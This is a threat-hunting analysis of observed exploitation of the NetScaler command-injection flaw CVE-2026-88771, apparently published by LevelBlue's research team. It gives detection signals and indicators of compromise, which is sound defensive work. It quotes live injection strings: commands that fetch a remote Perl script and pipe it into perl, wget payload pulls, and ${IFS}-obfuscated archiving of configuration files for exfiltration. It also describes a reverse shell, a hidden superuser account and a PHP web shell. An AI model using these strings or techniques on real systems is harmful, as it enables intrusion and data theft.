Citrix NetScaler CVE-2026-88771: Observed Exploitation Artifacts and Hunt Indicators
6 Minute Read
by Sean Shirley
With contributions from James Rodriguez, Gus Staminatos, and Timmy Lister.
CVE-2026-88771 is a critical pre-authentication command-injection vulnerability affecting Citrix NetScaler ADC and NetScaler Gateway. Citrix and security researchers have already documented the vulnerability and its underlying exploitation mechanism. This analysis focuses instead on exploitation activity identified by LevelBlue's Threat Hunt Operations & Research (THOR) team while hunting across multiple customer environments.
During these investigations, THOR identified malicious NetScaler authentication events containing attacker-controlled usernames designed to exploit CVE-2026-88771. The observed activity included basic command-execution testing, payload retrieval, configuration collection and staging, reverse-shell deployment, persistence, web-shell installation, and attempted exfiltration of NetScaler configuration data.
Analysis of infrastructure and second-stage payloads referenced within these commands provided additional artifacts that defenders can use to identify exploitation attempts and investigate whether successful post-exploitation activity occurred.
The indicators presented throughout this analysis are not exhaustive. They represent activity observed during our investigations and should be used alongside behavioral hunting and other available telemetry.
Observed Exploitation Activity
One of the most consistent characteristics across the identified events was attacker-controlled authentication data containing variations of the pitboss and NSPPE strings associated with exploitation of CVE-2026-88771.
Some observed attempts performed basic command-execution testing:
-
pitboss PPE unexpectedly died NSPPE;whoami;# X
Other attempts used curl or wget to retrieve additional payloads:
-
pitboss PPE unexpectedly died NSPPE;curl hxxp://64.94.85[.]67:443/update_c08937.pl | perl;# X
-
pitboss PPE unexpectedly died NSPPE;wget hxxp://31.56.197[.]72:9090/lula;# X
-
pitboss PPE unexpectedly died NSPPE;shell; curl hxxp://31.56.197[.]72:9090/lula;# X
The activity also included commands designed to collect NetScaler configuration data. One observed command attempted to copy ns.conf into a file within the NetScaler web directory:
-
pitboss PPE unexpectedly died NSPPE;cat /flash/nsconfig/ns.conf>/var/netscaler/logon/insight-new.js;# X
Another attempted to archive the entire /flash/nsconfig directory and place the resulting archive under LogonPoint:
-
pitboss PPE unexpectedly died NSPPE;tar${IFS}czf${IFS}/var/netscaler/logon/LogonPoint/xua.html${IFS}/flash/nsconfig;# X
We also observed a variation using command substitution rather than the more common semicolon-delimited format:
zq pitboss NSPPE X`tar${IFS}czf${IFS}/var/netscaler/logon/LogonPoint/xua.html${IFS}/flash/nsconfig`Y unexpectedly died
The use of ${IFS} provides an additional search opportunity because it allows commands to represent whitespace without using literal spaces.
Taken together, the observed commands demonstrate activity extending beyond basic vulnerability validation. The attempts included payload retrieval and execution as well as collection and staging of NetScaler configuration data.
Analysis of main.py
One of the second-stage payloads identified during the investigation was main.py, which was hosted at hxxp://23.27.143[.]20:9000/main.py. Analysis of the script showed that it targets /var/python/bin/customsnmpd, overwriting the file with Python code designed to establish a reverse shell.

Figure 1. Sample of main.py.
The newly written customsnmpd creates a TCP connection to 45.141.21[.]130 over port 443 and redirects standard input, output, and error to the socket before launching an interactive /bin/sh shell. The original main.py script also searches for processes associated with /var/python/bin/customsnmpd and terminates matching processes.
This provides defenders with several additional hunting opportunities beyond the original main.py file. Unexpected modification or execution of /var/python/bin/customsnmpd, connections from a NetScaler appliance to 45.141.21[.]130:443, or interactive shell activity associated with the modified process may indicate that exploitation progressed beyond initial command execution to deployment of the second-stage payload.
Dedicated to hunting and eradicating the world's most challenging threats.
SpiderLabsAnalysis of update_c08937.pl
Another second-stage payload identified during the investigation was update_c08937.pl, hosted at hxxp://64.94.85[.]67:443/update_c08937.pl. The observed exploitation command used curl to retrieve the script and pipe it directly into Perl, allowing it to execute without first being saved to a fixed location on disk.

Figure 2. Sample of update_c08937.pl.
Analysis of the script showed several post-exploitation capabilities. It modifies /flash/nsconfig/ns.conf to create a local account named sec_monitor and assigns it the superuser role. It also archives the /flash/nsconfig directory into /tmp/update_result_3567cs.tgz and attempts to upload the resulting archive to 64.94.85[.]67:443, providing the attacker with NetScaler configuration data. Following the transfer attempt, the script removes the archive and deletes itself, reducing the number of artifacts remaining on disk.
The payload also changes the permissions of /bin/sh to 6555 and deploys a PHP web shell at /var/netscaler/logon/LogonPoint/.local_journal. It modifies /etc/httpd.conf to enable PHP execution and maps the web shell to URLs resembling legitimate NetScaler CSS resources, including LogonUISimple.html.style.min.css and randomized hexadecimal variations of the filename. The web shell provides remote command execution along with file upload and download functionality.
Post-Exploitation Artifacts
The behaviors within update_c08937.pl provide several artifacts that can help determine whether the payload successfully executed. High-value indicators include the sec_monitor account, changes to /flash/nsconfig/ns.conf, the temporary /tmp/update_result_3567cs.tgz archive, altered permissions on /bin/sh, and the .local_journal PHP web shell. The payload also modifies /etc/httpd.conf to expose the web shell through URLs resembling legitimate NetScaler CSS resources.
Investigators should also review network telemetry for connections to 64.94.85[.]67:443, particularly following an observed exploitation attempt. Because the payload deletes both the configuration archive and itself during execution, the absence of those files does not necessarily indicate that execution was unsuccessful.
Detection Opportunities
While the infrastructure, payload names, and file hashes observed during these investigations provide useful hunting pivots, the strongest detection opportunities come from the behaviors associated with exploitation and post-exploitation. IP addresses, filenames, and payloads can change, while command injection within authentication data, access to NetScaler configuration files, modification of appliance components, and creation of web-accessible artifacts provide broader opportunities to identify similar activity.
|
Signal |
Target |
Notes |
|
Authentication fields containing pitboss, NSPPE, unexpectedly died, or ${IFS} alongside shell commands |
NetScaler authentication logs |
High-value indicator of CVE-2026-88771 exploitation attempts, particularly when combined with curl, wget, whoami, perl, python, tar, or cat. |
|
Creation of .local_journal, insight-new.js, or xua.html within NetScaler web directories |
/var/netscaler/logon/ and /var/netscaler/logon/LogonPoint/ |
Observed activity used these locations for web-shell deployment or staging NetScaler configuration data. |
|
Unexpected access to or archiving of /flash/nsconfig |
NetScaler configuration |
Observed commands copied or archived configuration data for staging or attempted exfiltration. |
|
Creation or modification of the sec_monitor account with superuser privileges |
NetScaler local accounts and /flash/nsconfig/ns.conf |
Behavior associated with update_c08937.pl and intended to establish privileged access. |
|
Changes to /etc/httpd.conf, including PHP enablement or new Alias/SetHandler directives |
NetScaler web-server configuration |
The analyzed Perl payload modified the HTTP configuration to expose .local_journal as a PHP web shell through CSS-like URLs. |
|
/bin/sh permissions changed to 6555 |
Appliance filesystem |
update_c08937.pl explicitly performs chmod 6555 /bin/sh; unexpected permission changes should be investigated. |
|
Modification or execution of /var/python/bin/customsnmpd |
Appliance processes and filesystem |
Observed main.py activity overwrote this file with code intended to establish a reverse shell. |
|
Network connections following command-injection activity to infrastructure referenced within the injected command |
Network telemetry |
Connections shortly after an exploitation attempt may provide evidence that injected commands progressed to payload retrieval, C2, or attempted exfiltration. |
Indicators of Compromise
The following indicators were identified during THOR investigations into CVE-2026-88771 exploitation activity across multiple customer environments. These indicators include exploitation infrastructure, payload-hosting and command-and-control infrastructure, malicious URLs, payload hashes, and post-exploitation artifacts. These indicators are not exhaustive and should be evaluated alongside surrounding activity and behavioral telemetry.
|
Indicator |
Type |
Description |
|
70.172.58[.]168 |
IPv4 |
Source of NetScaler exploitation attempts |
|
45.141.21[.]130 |
IPv4 |
Reverse-shell C2 infrastructure |
|
162.243.36[.]88 |
IPv4 |
Source of NetScaler exploitation attempts |
|
173.40.135[.]209 |
IPv4 |
Source of NetScaler exploitation attempts |
|
47.230.224[.]154 |
IPv4 |
Source of NetScaler exploitation attempts |
|
23.27.143[.]20 |
IPv4 |
Exploit source and payload host |
|
62.133.62[.]80 |
IPv4 |
Payload-hosting infrastructure |
|
64.94.85[.]67 |
IPv4 |
Exploit, payload, and exfiltration infrastructure |
|
92.118.204[.]229 |
IPv4 |
Source of command-execution testing |
|
87.224.84[.]82 |
IPv4 |
Source of configuration-staging attempt |
|
31.56.197[.]72 |
IPv4 |
Payload-hosting infrastructure |
|
hxxp://62.133.62[.]80:80/xd7h/x |
URL |
Payload download URL |
|
hxxp://23.27.143[.]20:9000/main.py |
URL |
Python reverse-shell payload |
|
hxxp://64.94.85[.]67:443/update_c08937.pl |
URL |
Perl post-exploitation payload |
|
hxxp://64.94.85[.]67:443/update_result_3567cs.tgz |
URL |
Configuration exfiltration endpoint |
|
hxxp://31.56.197[.]72:9090/lula |
URL |
Payload download URL |
|
e9fe43968c6c0955300e3bc4d7fb0b05a18570b4733aaf4f5c6f7f09be5a242c |
SHA-256 |
main.py |
|
974b69782fdf5d67b97cfd508465939e44ee10798dbcc1e82b92d78776bad938 |
SHA-256 |
update_c08937.pl |
|
/var/netscaler/logon/LogonPoint/.local_journal |
File |
PHP web shell |
|
/tmp/update_result_3567cs.tgz |
File |
Staged NetScaler configuration archive |
|
/var/netscaler/logon/insight-new.js |
File |
Staged NetScaler configuration |
|
/var/netscaler/logon/LogonPoint/xua.html |
File |
Staged configuration archive |
|
sec_monitor |
Account |
Privileged account created by payload |
Key Takeaways for Defenders
The activity observed during this hunt shows that CVE-2026-88771 exploitation was not limited to basic vulnerability testing. While some attempts used commands such as whoami to test command execution, others attempted to retrieve additional payloads, collect NetScaler configuration data, establish reverse shells, create privileged accounts, and deploy web shells.
The observed indicators provide useful pivots for identifying this specific activity, but defenders should not rely exclusively on known IP addresses, filenames, URLs, or hashes. Infrastructure and payloads can be changed quickly. Authentication data containing shell commands, unexpected access to /flash/nsconfig, creation of files within NetScaler web directories, changes to appliance configuration, and unusual network activity following an exploitation attempt provide more durable hunting opportunities.
Organizations should ensure affected NetScaler appliances are patched and review historical telemetry for evidence of exploitation that may have occurred before remediation. Where an exploitation attempt is identified, the investigation should continue beyond the initial authentication event to determine whether command execution or subsequent post-exploitation activity occurred. Failed authentication events should not be treated as evidence that the exploitation attempt itself was unsuccessful.
About the Author
Sean Shirley is a Cyber Threat Intelligence Analyst at LevelBlue specializing in threat hunting, malware analysis, and threat research. He focuses on analyzing emerging threats and translating technical findings into actionable intelligence for defensive operations. Follow Sean on LinkedIn.
About LevelBlue
LevelBlue secures what's next with intelligence-led security delivering visibility and speed to stop threats faster. As the world’s largest and most analyst-recognized pure-play managed security services provider, our AI-powered managed services and cyber expertise across managed, advisory, and incident response services help clients operate with confidence. Learn more about us.